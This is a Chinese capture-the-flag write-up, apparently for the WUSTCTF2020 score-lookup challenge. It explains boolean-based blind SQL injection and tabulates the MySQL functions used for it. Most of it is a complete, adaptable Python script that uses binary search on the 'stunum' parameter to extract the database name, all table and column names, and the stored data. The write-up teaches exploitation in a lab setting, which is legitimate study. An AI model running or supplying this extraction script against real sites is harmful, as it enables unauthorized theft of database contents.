目录
信息收集
脚本
reference
信息收集
输入1出现固定的回显,输入2-4出现乱码
Hi admin, your score is: 100
输入其他特殊字符无回显,也无报错回显
采用布尔注入进行判断
布尔注入原理
代码存在SQL注入漏洞,然而页面即不会回显数据,也不会回显错误信息,只返回“Right”与“Wrong”这里我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”与“假”来识别我们的判断是否正确
布尔盲注方法
构造逻辑判断语句,判断信息真假,取出所有的真值,实现SQL注入
| Left() 函数 | left(database(),1)>‘s’ | database()显示数据库名称,left(a,b)从左到右截取a的前b位 |
| like | select user()like’ro%’ | 与regexp类似,使用like进行匹配 |
| regexp | select user() regexp ‘^r’ | 正则表达式的用法,user()结果为root,regexp 为匹配 root 的正则表达式 |
| substr()函数 ascii()函数 | ascii(substr((select database()),1,1))=98 | substr(a,b,c)从b位置开始,截取字符串a的c长度,ascii()将某个字符转换为ascii值 |
| ord() 函数 mid() 函数 | ord(mid((select user()),1,1))=114 | mid(a,b,c)从位置b开始,截取a字符串的c位ord()函数同ascii(),将字符转为ascii值 |
脚本
脚本如下(python)使用时修改为自己的Success_message,url,以及re的正则规则即可。
import time
import requests
import re
Success_message = "Hi"
def cont(text):
obj=re.compile(r'<h2 class="mb">(?P<xiao>.*?)</h2>',re.S)
res = obj.finditer(text)
for i in res:
c=(i.group("xiao"))
return c
def database_name():
db_name = ''
for i in range(1, 10):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
db_name += chr(mid)
print("数据库名: " + db_name)
return db_name
def table_name():
name = ''
for j in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
name += chr(mid)
print("表名: " + name)
table_list = name.split(",")
for tab_name in table_list:
column_name(tab_name)
def column_name(tab_name):
name = ''
for j in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
'1)) > %d)' % (tab_name, j, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
name += chr(mid)
print(("%s表的字段名: " + name) % tab_name)
column_list = name.split(",")
for col_name in column_list:
get_data(tab_name, col_name)
def get_data(tab_name, col_name):
data = ''
for i in range(1, 100):
begin = 32
end = 126
mid = (begin + end) // 2
while begin < end:
payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (col_name, tab_name, i, mid)
time.sleep(0.2)
res = requests.get(payload)
if Success_message in cont(res.text):
begin = mid + 1
else:
end = mid
mid = (begin + end) // 2
if mid == 32:
print()
break
data += chr(mid)
print(("%s表的%s字段数据: " + data) % (tab_name, col_name))
if __name__ == '__main__':
url = input("请输入url:")
database_name()
table_name()
reference
[WUSTCTF2020]颜值成绩查询_Tajang的博客-CSDN博客
